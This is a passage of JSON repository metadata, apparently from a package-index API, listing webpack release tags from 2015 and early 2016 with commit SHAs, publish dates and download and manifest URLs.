sts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9